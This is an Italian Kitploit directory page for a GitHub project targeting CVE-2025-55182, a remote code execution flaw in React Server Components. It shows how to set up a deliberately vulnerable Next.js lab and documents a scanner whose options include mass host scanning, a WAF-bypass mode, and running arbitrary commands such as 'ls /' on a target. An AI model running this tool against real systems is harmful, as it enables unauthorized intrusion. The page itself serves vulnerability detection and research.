Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182 — CVE-2025-55182(vulnerabilità di esecuzione remota di codice tramite deserializzazione nei React Server Components) | Kitploit
Strumenti/GitHubGitHub/xiaolvchen/cve-2025-55182
Scanner di VulnerabilitàGenerazione di PayloadExploitSfruttamento di Applicazioni WebBypass WAFPenetration Testing
GitHubxiaolvchen/cve-2025-55182

CVE-2025-55182

CVE-2025-55182(vulnerabilità di esecuzione remota di codice tramite deserializzazione nei React Server Components)

Vedi Repository
17 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Versioni affette

ComponenteVersione raccomandata per la riproduzioneIntervallo di versioni vulnerabili
Node.js>= 20.9.020.9.0 (LTS) e successive
Next.js15.0.015.x, 16.x (App Router)
React Core19.0.0 o 19.2.0da 19.0.0 a 19.2.0
RSC Bundlerreact-server-dom-webpackda 19.0.0 a 19.2.0

Costruzione e avvio

  1. Forza l'installazione di una versione inferiore

    root@kitploit:~
    cd cve-2025-55182-target
    npm install --force
    
  2. Verifica le versioni delle dipendenze

    root@kitploit:~
    npm list react next
    # Verifica che l'output mostri [email protected] e [email protected]
    

    Finchè l'elenco delle dipendenze di primo livello mostra [email protected] e [email protected], l'ambiente è stato bloccato con successo in uno stato vulnerabile. Puoi ignorare eventuali avvisi e codici di errore.

  3. Costruzione:

    root@kitploit:~
    npm run build
    
  4. Esecuzione:

    root@kitploit:~
    npm start
    

    Il server sarà in ascolto su http://localhost:3000. L'ambiente è pronto. Puoi iniziare la verifica della vulnerabilità.

Esempi

  • Rilevamento/scansione delle vulnerabilità:

    root@kitploit:~
    cd React2shell
    python3 scanner.py -u http://127.0.0.1:3000/
    
  • RCE:

    root@kitploit:~
    python3 scanner_with_rce.py -u http://127.0.0.1:3000/ -c "ls /"
    

poc

Riferimenti

react2shell-scanner

react2shell-scanner

Un tool da riga di comando per rilevare le vulnerabilità CVE-2025-55182 e CVE-2025-66478 nei React Server Components (RSC) nelle applicazioni Next.js.

Per una descrizione dettagliata dei dettagli tecnici della vulnerabilità e dei metodi di rilevamento, consulta il nostro post sul blog: https://slcyber.io/research-center/high-fidelity-detection-mechanism-for-rsc-next-js-rce-cve-2025-55182-cve-2025-66478

Come funziona

Per impostazione predefinita, lo scanner invia una richiesta POST multipart appositamente predisposta contenente un payload di verifica RCE per eseguire un'operazione matematica deterministica (41*271 = 11111). L'host vulnerabile restituirà il risultato del calcolo nell'intestazione di risposta X-Action-Redirect come /login?a=11111.

Lo scanner testa prima il percorso radice. Se il percorso radice non è vulnerabile, segue i reindirizzamenti same-origin (ad esempio da / a /en/) e testa la destinazione del reindirizzamento. Non segue reindirizzamenti cross-origin.

Modalità di rilevamento sicuro

Usando il flag --safe-check si attiva la modalità di rilevamento sicuro, che si basa su segnali indiretti (come codice di stato 500 e riepiloghi di errori specifici) senza eseguire codice sul target. Utilizza questa modalità quando non desideri eseguire RCE.

Bypass WAF

Usando il flag --waf-bypass viene aggiunto rumore casuale prima del corpo della richiesta multipart. Questo aiuta a bypassare i WAF che analizzano solo la parte iniziale del corpo. La dimensione predefinita è 128KB, configurabile con --waf-bypass-size. Quando il bypass WAF è abilitato, il timeout aumenta automaticamente a 20 secondi (a meno che non sia impostato esplicitamente).

Modalità Windows

Usando il flag --windows si passa il payload da Unix shell (echo $((41*271))) a PowerShell (powershell -c "41*271"), adatto per target in esecuzione su Windows.

Requisiti ambientali

  • Python 3.9+
  • requests
  • tqdm

Installazione

root@kitploit:~
pip install -r requirements.txt

Utilizzo

Scansiona un singolo host:

root@kitploit:~
python3 scanner.py -u https://example.com

Scansiona una lista di host:

root@kitploit:~
python3 scanner.py -l hosts.txt

Scansiona con multithreading e salva i risultati:

root@kitploit:~
python3 scanner.py -l hosts.txt -t 20 -o results.json

Scansiona con intestazioni personalizzate:

root@kitploit:~
python3 scanner.py -u https://example.com -H "Authorization: Bearer token" -H "Cookie: session=abc"

Scansiona utilizzando il rilevamento bypass sicuro:

root@kitploit:~
python3 scanner.py -u https://example.com --safe-check

Scansiona target Windows:

root@kitploit:~
python3 scanner.py -u https://example.com --windows

Scansiona con bypass WAF:

root@kitploit:~
python3 scanner.py -u https://example.com --waf-bypass

Esegui comando RCE:

root@kitploit:~
python3 scanner.py -u https://example.com -c "ls /"

Descrizione delle opzioni

root@kitploit:~
-u, --url         URL singolo da controllare
-c, --cmd         Comando da eseguire
-l, --list        File contenente host (uno per riga)
-t, --threads     Numero di thread concorrenti (default: 10)
--timeout         Timeout richiesta in secondi (default: 10)
-o, --output      File di output per salvare i risultati (formato JSON)
--all-results     Salva tutti i risultati, non solo gli host vulnerabili
-k, --insecure    Disabilita la verifica del certificato SSL
-H, --header      Intestazione personalizzata (può essere usata più volte)
-v, --verbose     Mostra dettagli della risposta per host vulnerabili
-q, --quiet       Mostra solo host vulnerabili
--no-color        Disabilita output a colori
--safe-check      Usa rilevamento bypass sicuro invece di RCE PoC
--windows         Usa payload Windows PowerShell invece di Unix shell
--waf-bypass      Aggiungi rumore per bypassare il rilevamento WAF dei contenuti
--waf-bypass-size Dimensione del rumore (KB, default: 128)

Ringraziamenti

Il PoC per la RCE è stato originariamente divulgato pubblicamente da @maple3142 — siamo molto grati per il loro contributo nel rilasciare un PoC utilizzabile.

Questo tool è stato inizialmente creato per il rilevamento sicuro di questa RCE. Questa funzionalità è ancora disponibile tramite la modalità di rilevamento sicuro --safe-check.

Team di ricerca sulla sicurezza di Assetnote - Adam Kues, Tomais Williamson, Dylan Pindur, Patrik Grobshäuser, Shubham Shah xEHLE_ - Riflessione dell'output RCE nell'intestazione della risposta Nagli

Output

I risultati vengono stampati sul terminale. Quando si usa il parametro -o, gli host vulnerabili vengono salvati in un file JSON, inclusi richiesta e risposta HTTP complete per verifica.

Scarica lo strumento